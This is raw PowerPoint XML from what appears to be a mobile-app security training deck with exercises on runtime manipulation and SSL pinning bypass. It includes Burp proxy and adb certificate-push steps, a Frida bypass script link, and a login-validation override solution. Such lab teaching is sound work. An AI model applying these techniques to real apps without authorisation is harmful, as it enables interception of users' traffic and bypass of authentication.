                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LoginValidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isLoginValidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]" true</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>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8 : Runtime Manipulation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> [Solution]</a:t>
            </a:r>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033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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Communication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> services </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>TLS/SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>algorithms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> &amp; configuration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>SSL cert validation process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>pinning</a:t>
            </a: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network issue</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7316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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> « SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> »?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" b="1" i="1" dirty="0"/>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network issue</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SL Pinning on Andr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729" y="3027518"/>
            <a:ext cx="6349058" cy="286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6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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> « SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> »?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" b="1" i="1" dirty="0"/>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network issue</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SL Pinning in Android. How to achieve SSL pinning? | by Apurv Pandey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040" y="2648522"/>
            <a:ext cx="5624858" cy="343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657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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>The application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> an SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> all communication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> services. Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> hacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to break </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Universal Android SSL Pinning Bypass with Frida</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/</a:t>
            </a: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11 : SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> Bypass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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3805734" y="5413338"/>
            <a:ext cx="1438984" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Frida</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505267" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>NA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{513E9B9F-F806-4397-AE88-DABC54BF4490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2910" t="4658" r="50004" b="64471"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024001" y="5836949"/>
            <a:ext cx="1088231" cy="535781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202822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Select an x86 system image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Release Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Nougat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>API Level: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ABI: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>x86_64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Target: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Android 7.1.1 (Google APIs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Download the system image and then click Next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Google APIs images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> to have root privileges</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>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System Image</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100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB3CEB4-BAE9-4F49-A8EC-524B598A1C97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1739294" y="4221445"/>
            <a:ext cx="5665411" cy="2377508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"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0549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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: Configure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>emulator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Proxy (IP Proxy : 10.0.2.2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: export CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Mobexeler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:  copy the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>emulator</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>burpca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-cert-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>der.crt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/cert-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>der.crt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:  Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Universal Android SSL Pinning Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> with Frida</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
